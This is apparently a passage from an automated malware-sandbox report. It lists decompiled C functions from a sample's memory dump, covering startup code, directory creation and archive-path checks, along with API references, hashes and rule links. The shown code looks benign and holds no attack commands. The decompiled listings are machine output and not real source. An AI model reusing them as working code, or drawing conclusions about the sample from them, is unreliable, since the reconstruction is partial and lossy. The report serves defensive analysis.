				_push(0x43a0a4);
				_push(0x43a0a0);
				L0041F6DE();
				_t15 =  *0x43ca34; // 0x0
				 *(_t30 - 0x28) = _t15;
				__getmainargs(_t30 - 0x1c, _t30 - 0x2c, _t30 - 0x20,  *0x43ca30, _t30 - 0x28);
				_push(0x43a09c);
				_push(0x43a000);
				L0041F6DE();
				 *(__p___initenv()) =  *(_t30 - 0x20);
				_push( *(_t30 - 0x20));
				_push( *(_t30 - 0x2c));
				_push( *(_t30 - 0x1c));
				_t22 = L003EB0AE(_t33); // executed
				 *(_t30 - 0x24) = _t22;
				exit(_t22); // executed
				_t23 =  *((intOrPtr*)(_t30 - 0x14));
				_t27 =  *((intOrPtr*)( *_t23));
				 *((intOrPtr*)(_t30 - 0x30)) = _t27;
				_push(_t23);
				_push(_t27);
				L0041F6D8();
				return _t23;
			}










                                                                                                    0x0041f632
                                                                                                    0x0041f639
                                                                                                    0x0041f63e
                                                                                                    0x0041f643
                                                                                                    0x0041f648
                                                                                                    0x0041f64d
                                                                                                    0x0041f652
                                                                                                    0x0041f66b
                                                                                                    0x0041f671
                                                                                                    0x0041f676
                                                                                                    0x0041f67b
                                                                                                    0x0041f689
                                                                                                    0x0041f68b
                                                                                                    0x0041f68e
                                                                                                    0x0041f691
                                                                                                    0x0041f694
                                                                                                    0x0041f69c
                                                                                                    0x0041f6a0
                                                                                                    0x0041f6a6
                                                                                                    0x0041f6ab
                                                                                                    0x0041f6ad
                                                                                                    0x0041f6b0
                                                                                                    0x0041f6b1
                                                                                                    0x0041f6b2
                                                                                                    0x0041f6b9

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                                                                                                    • String ID:
                                                                                                    • API String ID: 279829931-0
                                                                                                    • Opcode ID: 829148675487a8f3d16bad67ec448e00b11ef31cb2a5df40a23f7ae40e8d7308
                                                                                                    • Instruction ID: 886f6db035d44a3fafc2db23381e1fd9193561c9c627ebf53d26b13ec454fa56
                                                                                                    • Opcode Fuzzy Hash: 829148675487a8f3d16bad67ec448e00b11ef31cb2a5df40a23f7ae40e8d7308
                                                                                                    • Instruction Fuzzy Hash: 69010C75940209AFDF15EFA1DC49DEE7B78FB0C314B20002AF501B2260DB399856DF29
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B5C27 Relevance: 9.1, APIs: 6, Instructions: 104COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1059 3b5c27-3b5c49 call 41f1b0 call 3b8717 1064 3b5c4b-3b5c56 CreateDirectoryW 1059->1064 1065 3b5c6c-3b5c6e 1059->1065 1066 3b5c58-3b5c5a 1064->1066 1067 3b5c5f-3b5c66 GetLastError 1064->1067 1068 3b5d02-3b5d09 GetLastError 1065->1068 1069 3b5c74-3b5c93 call 3b2d47 call 3b8820 1065->1069 1072 3b5d53-3b5d61 1066->1072 1067->1065 1067->1068 1070 3b5d0b-3b5d0d 1068->1070 1071 3b5d0f-3b5d39 call 3b64db call 3b2d47 call 3b695d 1068->1071 1081 3b5cf5-3b5d01 call 3b1e40 1069->1081 1082 3b5c95-3b5ca2 CreateDirectoryW 1069->1082 1070->1072 1093 3b5d3b-3b5d3d 1071->1093 1094 3b5d3f-3b5d45 1071->1094 1081->1068 1085 3b5ca8-3b5caf GetLastError 1082->1085 1086 3b5ca4-3b5ca6 1082->1086 1089 3b5cb1-3b5cb3 1085->1089 1090 3b5cb5-3b5cd8 call 3b64db call 3b2d47 call 3b695d 1085->1090 1087 3b5cf0-3b5cf3 1086->1087 1095 3b5d4b-3b5d51 call 3b1e40 1087->1095 1089->1087 1104 3b5cda-3b5cdc 1090->1104 1105 3b5cde-3b5ce4 1090->1105 1097 3b5d48 1093->1097 1094->1097 1095->1072 1097->1095 1106 3b5ce7-3b5cef call 3b1e40 1104->1106 1105->1106 1106->1087
                                                                                                    C-Code - Quality: 80%
                                                                                                    			E003B5C27(WCHAR* __ecx) {
				signed char _t34;
				signed int _t35;
				int _t42;
				signed char _t48;
				void* _t67;
				WCHAR* _t70;
				void* _t72;

				E0041F1B0(E00422E43, _t72);
				_t70 = __ecx;
				_t67 = E003B8717(__ecx);
				if(_t67 == 1) {
					L4:
					if(_t67 == 0) {
						L16:
						if(GetLastError() == 0xb7) {
							E003B64DB(_t72 - 0x88);
							E003B2D47(_t72 - 0x60);
							_push(0);
							_push(_t70);
							 *(_t72 - 4) = 2;
							if(E003B695D(_t72 - 0x88) != 0) {
								_t48 =  *(_t72 - 0x68) >> 0x00000004 & 0x00000001;
							} else {
								_t48 = 0;
							}
							_push( *((intOrPtr*)(_t72 - 0x60)));
							L22:
							E003B1E40(_t32);
							_t34 = _t48;
							L23:
							 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
							return _t34;
						}
						_t34 = 0;
						goto L23;
					}
					_t35 = E003B2D47(_t72 - 0x18);
					 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
					if(E003B8820(_t70, _t72 - 0x18, _t72, _t35 & 0xffffff00 | _t67 != 0x00000001) == 0) {
						 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
						E003B1E40(_t37,  *(_t72 - 0x18));
						goto L16;
					}
					if(CreateDirectoryW( *(_t72 - 0x18), 0) == 0) {
						if(GetLastError() == 0xb7) {
							E003B64DB(_t72 - 0x50);
							E003B2D47(_t72 - 0x28);
							_push(0);
							_push( *(_t72 - 0x18));
							 *(_t72 - 4) = 1;
							if(E003B695D(_t72 - 0x50) != 0) {
								_t48 =  *(_t72 - 0x30) >> 0x00000004 & 0x00000001;
							} else {
								_t48 = 0;
							}
							_t32 = E003B1E40(_t41,  *((intOrPtr*)(_t72 - 0x28)));
						} else {
							_t48 = 0;
						}
					} else {
						_t48 = 1;
					}
					_push( *(_t72 - 0x18));
					goto L22;
				}
				_t42 = CreateDirectoryW(__ecx, 0); // executed
				if(_t42 == 0) {
					if(GetLastError() == 0xb7) {
						goto L16;
					}
					goto L4;
				}
				_t34 = 1;
				goto L23;
			}










                                                                                                    0x003b5c2c
                                                                                                    0x003b5c37
                                                                                                    0x003b5c44
                                                                                                    0x003b5c49
                                                                                                    0x003b5c6c
                                                                                                    0x003b5c6e
                                                                                                    0x003b5d02
                                                                                                    0x003b5d09
                                                                                                    0x003b5d15
                                                                                                    0x003b5d1d
                                                                                                    0x003b5d22
                                                                                                    0x003b5d24
                                                                                                    0x003b5d2b
                                                                                                    0x003b5d39
                                                                                                    0x003b5d45
                                                                                                    0x003b5d3b
                                                                                                    0x003b5d3b
                                                                                                    0x003b5d3b
                                                                                                    0x003b5d48
                                                                                                    0x003b5d4b
                                                                                                    0x003b5d4b
                                                                                                    0x003b5d51
                                                                                                    0x003b5d53
                                                                                                    0x003b5d59
                                                                                                    0x003b5d61
                                                                                                    0x003b5d61
                                                                                                    0x003b5d0b
                                                                                                    0x00000000
                                                                                                    0x003b5d0b
                                                                                                    0x003b5c77
                                                                                                    0x003b5c7c
                                                                                                    0x003b5c93
                                                                                                    0x003b5cf8
                                                                                                    0x003b5cfc
                                                                                                    0x00000000
                                                                                                    0x003b5d01
                                                                                                    0x003b5ca2
                                                                                                    0x003b5caf
                                                                                                    0x003b5cb8
                                                                                                    0x003b5cc0
                                                                                                    0x003b5cc5
                                                                                                    0x003b5cca
                                                                                                    0x003b5ccd
                                                                                                    0x003b5cd8
                                                                                                    0x003b5ce4
                                                                                                    0x003b5cda
                                                                                                    0x003b5cda
                                                                                                    0x003b5cda
                                                                                                    0x003b5cea
                                                                                                    0x003b5cb1
                                                                                                    0x003b5cb1
                                                                                                    0x003b5cb1
                                                                                                    0x003b5ca4
                                                                                                    0x003b5ca4
                                                                                                    0x003b5ca4
                                                                                                    0x003b5cf0
                                                                                                    0x00000000
                                                                                                    0x003b5cf0
                                                                                                    0x003b5c4e
                                                                                                    0x003b5c56
                                                                                                    0x003b5c66
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b5c66
                                                                                                    0x003b5c58
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B5C2C
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,?,00000000), ref: 003B5C4E
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 003B5C5F
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 003B5C9A
                                                                                                    • GetLastError.KERNEL32 ref: 003B5CA8
                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 003B5D02
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CreateDirectory$H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 798237638-0
                                                                                                    • Opcode ID: cd6a038b62581ecba6062091a825a2c3bdad7448aa2baef556fc6d10df75f463
                                                                                                    • Instruction ID: 88cb758210f8eb05daeab3e4c8311eb416072454dc537ff899a860564aa1b82c
                                                                                                    • Opcode Fuzzy Hash: cd6a038b62581ecba6062091a825a2c3bdad7448aa2baef556fc6d10df75f463
                                                                                                    • Instruction Fuzzy Hash: 0C31E631A01715DADF13ABA0CC5ABEDBB35AF5130CF540128E702AB992CB654E45EA54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D0461 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 213COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 83%
                                                                                                    			E003D0461(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				intOrPtr _t111;
				signed int _t122;
				void* _t137;
				void* _t143;
				void* _t151;
				signed char _t158;
				void* _t160;
				void* _t162;
				signed int _t172;
				intOrPtr _t189;
				intOrPtr* _t219;
				signed int _t225;
				signed int _t226;
				signed int _t231;
				void* _t234;

				E0041F1B0(E0042480B, _t234);
				_push(__ebx);
				E003FD423(_t234 - 0x18);
				_t166 = 0;
				 *(_t234 - 4) = 0;
				E003CEE23(_t234 - 0xdc); // executed
				 *((intOrPtr*)(_t234 - 0x44)) =  *((intOrPtr*)(_t234 + 0x18));
				_push(_t234 - 0xdc);
				_push( *((intOrPtr*)(_t234 + 8)));
				 *(_t234 - 4) = 1;
				_t111 = E003CF237(__ecx, __edx); // executed
				_t172 = 0xc;
				 *((intOrPtr*)(_t234 + 0x18)) = _t111;
				memcpy( *(_t234 + 0x14), _t234 - 0xa4, _t172 << 2);
				if(_t111 == 0) {
					_t225 = 0;
					__eflags =  *(_t234 - 0xb4);
					if( *(_t234 - 0xb4) > 0) {
						do {
							_t158 =  *( *((intOrPtr*)( *((intOrPtr*)(_t234 - 0xb8)) + _t225 * 4)) + 0x20) >> 4;
							__eflags = _t158 & 0x00000001;
							if((_t158 & 0x00000001) == 0) {
								_t160 = E003CED4D(_t234 - 0xdc, _t234 - 0x24, _t225);
								 *(_t234 - 4) = 2;
								E003EF23F(_t234 - 0x18);
								_push(_t160);
								_t162 = E003B1524(_t234 - 0x18);
								 *(_t234 - 4) = 1;
								E003B1E40(_t162,  *((intOrPtr*)(_t234 - 0x24)));
							}
							_t225 = _t225 + 1;
							__eflags = _t225 -  *(_t234 - 0xb4);
						} while (_t225 <  *(_t234 - 0xb4));
					}
					 *(_t234 - 4) =  *(_t234 - 4) & 0x00000000;
					L17();
					__eflags =  *((intOrPtr*)(_t234 - 0x14)) - _t166;
					if(__eflags == 0) {
						_push(_t166);
						_push( *0x42ae24);
						E003D097C(_t234 - 0x24, __eflags);
						_push(0x431428);
						_push(_t234 - 0x24);
						L0041F1D0();
					}
					E003FD423(_t234 - 0x3c);
					_t226 = 0;
					__eflags =  *((intOrPtr*)(_t234 - 0x14)) - _t166;
					 *(_t234 - 4) = 3;
					if(__eflags > 0) {
						do {
							E003B2D47(_t234 - 0x24);
							 *(_t234 - 4) = 4;
							E003B600A( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t234 - 0x18)) + _t226 * 4)))), _t234 - 0x24);
							E003EF23F(_t234 - 0x3c);
							_push(_t234 - 0x24);
							_t151 = E003B1524(_t234 - 0x3c);
							 *(_t234 - 4) = 3;
							E003B1E40(_t151,  *((intOrPtr*)(_t234 - 0x24)));
							_t226 = _t226 + 1;
							__eflags = _t226 -  *((intOrPtr*)(_t234 - 0x14));
						} while (__eflags < 0);
					}
					 *(_t234 - 0x30) = _t166;
					 *(_t234 - 0x2c) = _t166;
					 *(_t234 - 0x28) = _t166;
					 *(_t234 - 4) = 5;
					L003DDFB5(_t234 - 0x3c, _t234 - 0x30, __eflags);
					E003D6B24( *((intOrPtr*)(_t234 + 0xc)));
					E003EEE93( *((intOrPtr*)(_t234 + 0xc)),  *(_t234 - 0x2c));
					_t219 =  *((intOrPtr*)(_t234 + 0x10));
					E003D6B24(_t219);
					_t118 = E003EEE93(_t219,  *(_t234 - 0x2c));
					__eflags =  *(_t234 - 0x2c);
					if( *(_t234 - 0x2c) <= 0) {
						L14:
						E003B1E40(_t118,  *(_t234 - 0x30));
						 *(_t234 - 4) =  *(_t234 - 4) & 0x00000000;
						E003D0A72(_t166, _t234 - 0x3c);
						 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
						E003D0A72(_t166, _t234 - 0x18);
						_t122 = 0;
						__eflags = 0;
						goto L15;
					} else {
						do {
							_t231 =  *( *(_t234 - 0x30) + _t166 * 4) << 2;
							_push( *((intOrPtr*)(_t231 +  *((intOrPtr*)(_t234 - 0x18)))));
							E003B1524( *((intOrPtr*)(_t234 + 0xc)));
							_push( *((intOrPtr*)(_t231 +  *((intOrPtr*)(_t234 - 0x3c)))));
							_t118 = E003B1524(_t219);
							__eflags = _t166;
							if(_t166 <= 0) {
								goto L13;
							} else {
								__eflags = E003B4268( *((intOrPtr*)( *((intOrPtr*)( *_t219 + _t166 * 4)))),  *((intOrPtr*)( *((intOrPtr*)( *_t219 + _t166 * 4 - 4)))));
								if(__eflags == 0) {
									_t189 = _t234 - 0x24;
									_push( *((intOrPtr*)( *((intOrPtr*)( *_t219 + _t166 * 4)))));
									_push("Duplicate archive path:");
									E003D097C(_t189, __eflags);
									_push(0x431428);
									_push(_t234 - 0x24);
									L0041F1D0();
									_t137 = E0041F1B0(E00424841, _t234);
									_push(_t189);
									_push(_t231);
									_t232 = _t189;
									 *((intOrPtr*)(_t234 - 0x10)) = _t189;
									 *(_t234 - 4) = 3;
									E003B1E40(_t137,  *((intOrPtr*)(_t189 + 0x8c)));
									E003CEEF1(_t189 + 0x68);
									 *(_t234 - 4) = 2;
									E003B1E40(E003B1E40(E003D0AA7(_t166, _t232 + 0x24),  *((intOrPtr*)(_t232 + 0x18))),  *((intOrPtr*)(_t232 + 0xc)));
									_t102 = _t234 - 4;
									 *_t102 =  *(_t234 - 4) | 0xffffffff;
									__eflags =  *_t102;
									_t143 = E003D0A72(_t166, _t232);
									 *[fs:0x0] =  *((intOrPtr*)(_t234 - 0xc));
									return _t143;
								} else {
									goto L13;
								}
							}
							goto L18;
							L13:
							_t166 = _t166 + 1;
							__eflags = _t166 -  *(_t234 - 0x2c);
						} while (_t166 <  *(_t234 - 0x2c));
						goto L14;
					}
				} else {
					 *(_t234 - 4) =  *(_t234 - 4) & 0;
					L17();
					 *(_t234 - 4) =  *(_t234 - 4) | 0xffffffff;
					E003D0A72(0, _t234 - 0x18);
					_t122 =  *((intOrPtr*)(_t234 + 0x18));
					L15:
					 *[fs:0x0] =  *((intOrPtr*)(_t234 - 0xc));
					return _t122;
				}
				L18:
			}


















                                                                                                    0x003d0466
                                                                                                    0x003d0471
                                                                                                    0x003d047b
                                                                                                    0x003d0480
                                                                                                    0x003d0488
                                                                                                    0x003d048b
                                                                                                    0x003d0495
                                                                                                    0x003d049e
                                                                                                    0x003d04a1
                                                                                                    0x003d04a4
                                                                                                    0x003d04a8
                                                                                                    0x003d04ba
                                                                                                    0x003d04bb
                                                                                                    0x003d04be
                                                                                                    0x003d04c0
                                                                                                    0x003d04e4
                                                                                                    0x003d04e6
                                                                                                    0x003d04ec
                                                                                                    0x003d04ee
                                                                                                    0x003d04fa
                                                                                                    0x003d04fd
                                                                                                    0x003d04ff
                                                                                                    0x003d050c
                                                                                                    0x003d0516
                                                                                                    0x003d051a
                                                                                                    0x003d0522
                                                                                                    0x003d0523
                                                                                                    0x003d0528
                                                                                                    0x003d052f
                                                                                                    0x003d0534
                                                                                                    0x003d0535
                                                                                                    0x003d0536
                                                                                                    0x003d0536
                                                                                                    0x003d04ee
                                                                                                    0x003d053e
                                                                                                    0x003d0548
                                                                                                    0x003d054d
                                                                                                    0x003d0550
                                                                                                    0x003d0552
                                                                                                    0x003d0556
                                                                                                    0x003d055c
                                                                                                    0x003d0564
                                                                                                    0x003d0569
                                                                                                    0x003d056a
                                                                                                    0x003d056a
                                                                                                    0x003d0572
                                                                                                    0x003d0577
                                                                                                    0x003d0579
                                                                                                    0x003d057c
                                                                                                    0x003d0580
                                                                                                    0x003d0582
                                                                                                    0x003d0585
                                                                                                    0x003d0590
                                                                                                    0x003d059b
                                                                                                    0x003d05a3
                                                                                                    0x003d05ae
                                                                                                    0x003d05af
                                                                                                    0x003d05b4
                                                                                                    0x003d05bb
                                                                                                    0x003d05c0
                                                                                                    0x003d05c2
                                                                                                    0x003d05c2
                                                                                                    0x003d0582
                                                                                                    0x003d05c7
                                                                                                    0x003d05ca
                                                                                                    0x003d05cd
                                                                                                    0x003d05d6
                                                                                                    0x003d05da
                                                                                                    0x003d05e5
                                                                                                    0x003d05ee
                                                                                                    0x003d05f3
                                                                                                    0x003d05fb
                                                                                                    0x003d0603
                                                                                                    0x003d0608
                                                                                                    0x003d060c
                                                                                                    0x003d0658
                                                                                                    0x003d065b
                                                                                                    0x003d0660
                                                                                                    0x003d0668
                                                                                                    0x003d066d
                                                                                                    0x003d0674
                                                                                                    0x003d0679
                                                                                                    0x003d0679
                                                                                                    0x00000000
                                                                                                    0x003d060e
                                                                                                    0x003d060e
                                                                                                    0x003d061c
                                                                                                    0x003d061f
                                                                                                    0x003d0622
                                                                                                    0x003d062c
                                                                                                    0x003d062f
                                                                                                    0x003d0634
                                                                                                    0x003d0636
                                                                                                    0x00000000
                                                                                                    0x003d0638
                                                                                                    0x003d064e
                                                                                                    0x003d0650
                                                                                                    0x003d068e
                                                                                                    0x003d0694
                                                                                                    0x003d0696
                                                                                                    0x003d069b
                                                                                                    0x003d06a3
                                                                                                    0x003d06a8
                                                                                                    0x003d06a9
                                                                                                    0x003d06b3
                                                                                                    0x003d06b8
                                                                                                    0x003d06b9
                                                                                                    0x003d06ba
                                                                                                    0x003d06bc
                                                                                                    0x003d06c5
                                                                                                    0x003d06cc
                                                                                                    0x003d06d5
                                                                                                    0x003d06dd
                                                                                                    0x003d06f1
                                                                                                    0x003d06f6
                                                                                                    0x003d06f6
                                                                                                    0x003d06f6
                                                                                                    0x003d06fe
                                                                                                    0x003d0707
                                                                                                    0x003d070f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d0650
                                                                                                    0x00000000
                                                                                                    0x003d0652
                                                                                                    0x003d0652
                                                                                                    0x003d0653
                                                                                                    0x003d0653
                                                                                                    0x00000000
                                                                                                    0x003d060e
                                                                                                    0x003d04c2
                                                                                                    0x003d04c2
                                                                                                    0x003d04cb
                                                                                                    0x003d04d0
                                                                                                    0x003d04d7
                                                                                                    0x003d04dc
                                                                                                    0x003d067b
                                                                                                    0x003d0681
                                                                                                    0x003d0689
                                                                                                    0x003d0689
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003D0466
                                                                                                      • Part of subcall function 003CEE23: __EH_prolog.LIBCMT ref: 003CEE28
                                                                                                      • Part of subcall function 003CF237: __EH_prolog.LIBCMT ref: 003CF23C
                                                                                                    • _CxxThrowException.MSVCRT(?,00431428), ref: 003D056A
                                                                                                      • Part of subcall function 003D06AE: __EH_prolog.LIBCMT ref: 003D06B3
                                                                                                    Strings
                                                                                                    • Duplicate archive path:, xrefs: 003D0696
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$ExceptionThrow
                                                                                                    • String ID: Duplicate archive path:
                                                                                                    • API String ID: 2366012087-4000988232
                                                                                                    • Opcode ID: 0d513734186103ab1e71f07c04f48e43ef33a6d2ed8020339ba252282a7e6dda
                                                                                                    • Instruction ID: 48eecb9222c8fba7bec65d831a73ab9db8e8f87165e33500206814612043ae19
                                                                                                    • Opcode Fuzzy Hash: 0d513734186103ab1e71f07c04f48e43ef33a6d2ed8020339ba252282a7e6dda
                                                                                                    • Instruction Fuzzy Hash: FE818E32D00159DFCF1AEFA4E491ADDB7B1EF49304F1040AAE5127B2A2DB30AE05CB60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003F7C24 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1201 3f7c24-3f7c59 call 41f1b0 call 3f7cd8 1205 3f7c5e-3f7cd7 call 3f8050 call 3b2d47 1201->1205
                                                                                                    C-Code - Quality: 95%
                                                                                                    			E003F7C24(intOrPtr __ecx, void* __edx) {
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t45;

				E0041F1B0(E00427603, _t45);
				_push(__ecx);
				 *((intOrPtr*)(_t45 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x42b0d8;
				 *((intOrPtr*)(__ecx + 4)) = 0x42b0bc;
				 *((intOrPtr*)(__ecx + 8)) = 0x42b098;
				 *((intOrPtr*)(__ecx + 0xc)) = 0x42b0a8;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				E003F7CD8(__ecx + 0x18, __edx, 0); // executed
				 *((intOrPtr*)(_t45 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0xa8)) = 0;
				 *((char*)(_t45 - 4)) = 1;
				E003F8050(__ecx + 0xb0, 0);
				 *((char*)(_t45 - 4)) = 2;
				E003B2D47(__ecx + 0x204);
				_t30 = __ecx + 0x210;
				 *_t30 = 0;
				 *((intOrPtr*)(_t30 + 4)) = 0;
				 *((intOrPtr*)(_t30 + 8)) = 0;
				_t31 = __ecx + 0x21c;
				 *_t31 = 0;
				 *((intOrPtr*)(_t31 + 4)) = 0;
				 *((intOrPtr*)(_t31 + 8)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x42eb78;
				 *((intOrPtr*)(__ecx + 4)) = 0x42eb5c;
				 *((intOrPtr*)(__ecx + 8)) = 0x42eb4c;
				 *((intOrPtr*)(__ecx + 0xc)) = 0x42eb38;
				 *((char*)(__ecx + 0x200)) = 0;
				 *((char*)(__ecx + 0x201)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t45 - 0xc));
				return __ecx;
			}






                                                                                                    0x003f7c29
                                                                                                    0x003f7c2e
                                                                                                    0x003f7c35
                                                                                                    0x003f7c38
                                                                                                    0x003f7c3e
                                                                                                    0x003f7c45
                                                                                                    0x003f7c4c
                                                                                                    0x003f7c56
                                                                                                    0x003f7c59
                                                                                                    0x003f7c5e
                                                                                                    0x003f7c61
                                                                                                    0x003f7c6d
                                                                                                    0x003f7c71
                                                                                                    0x003f7c7c
                                                                                                    0x003f7c80
                                                                                                    0x003f7c85
                                                                                                    0x003f7c8e
                                                                                                    0x003f7c90
                                                                                                    0x003f7c93
                                                                                                    0x003f7c96
                                                                                                    0x003f7c9c
                                                                                                    0x003f7c9e
                                                                                                    0x003f7ca1
                                                                                                    0x003f7ca4
                                                                                                    0x003f7caa
                                                                                                    0x003f7cb1
                                                                                                    0x003f7cb8
                                                                                                    0x003f7cbf
                                                                                                    0x003f7cc5
                                                                                                    0x003f7ccf
                                                                                                    0x003f7cd7

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003F7C29
                                                                                                      • Part of subcall function 003F7CD8: __EH_prolog.LIBCMT ref: 003F7CDD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: 8B$8BLB\B$LB$\B
                                                                                                    • API String ID: 3519838083-2440409942
                                                                                                    • Opcode ID: 3ce5e447426b88cf15ddf50293f0a13d665c5e9629e6274800dc1c38cb7bd11f
                                                                                                    • Instruction ID: 461dc21415658150aa116d776821d72ef3b67ec324a69242f356420b515e48eb
                                                                                                    • Opcode Fuzzy Hash: 3ce5e447426b88cf15ddf50293f0a13d665c5e9629e6274800dc1c38cb7bd11f
                                                                                                    • Instruction Fuzzy Hash: 3B11E6B1501B54CFC321CF6AD08869AFBE0FB15304F94C86ED1AA5B712C7B4A548CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B4ABB Relevance: 7.7, APIs: 5, Instructions: 234COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 94%
                                                                                                    			E003B4ABB(intOrPtr __ecx) {
				void* __ebx;
				intOrPtr _t117;
				intOrPtr _t118;
				void* _t134;
				void* _t136;
				signed int _t146;
				void* _t152;
				signed int _t156;
				intOrPtr* _t158;
				signed char _t162;
				char _t168;
				intOrPtr _t171;
				intOrPtr _t210;
				signed int _t213;
				void* _t214;
				intOrPtr _t219;
				wchar_t** _t220;
				void* _t222;

				E0041F1B0(E00422CD0, _t222);
				 *((intOrPtr*)(_t222 - 0x20)) = __ecx;
				_t171 =  *((intOrPtr*)(_t222 + 0x10));
				_t227 =  *((intOrPtr*)(_t171 + 4));
				if( *((intOrPtr*)(_t171 + 4)) == 0) {
					_push(0x4302c0);
					_push(_t222 + 8);
					 *(_t222 + 8) = "Empty file path";
					L0041F1D0();
				}
				 *((intOrPtr*)(_t222 - 0x30)) = 0;
				 *(_t222 - 0x2c) = 0;
				 *((intOrPtr*)(_t222 - 0x28)) = 0;
				 *(_t222 - 4) = 0;
				E003B433C(_t171, _t222 - 0x30, _t227); // executed
				_t117 =  *((intOrPtr*)(_t222 + 0x14));
				 *(_t222 - 0xd) = 1;
				_t173 =  *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x30)) +  *(_t222 - 0x2c) * 4 - 4));
				 *(_t222 + 0x13) = 1;
				asm("movsw");
				asm("movsb");
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t222 - 0x30)) +  *(_t222 - 0x2c) * 4 - 4)) + 4)) != 0) {
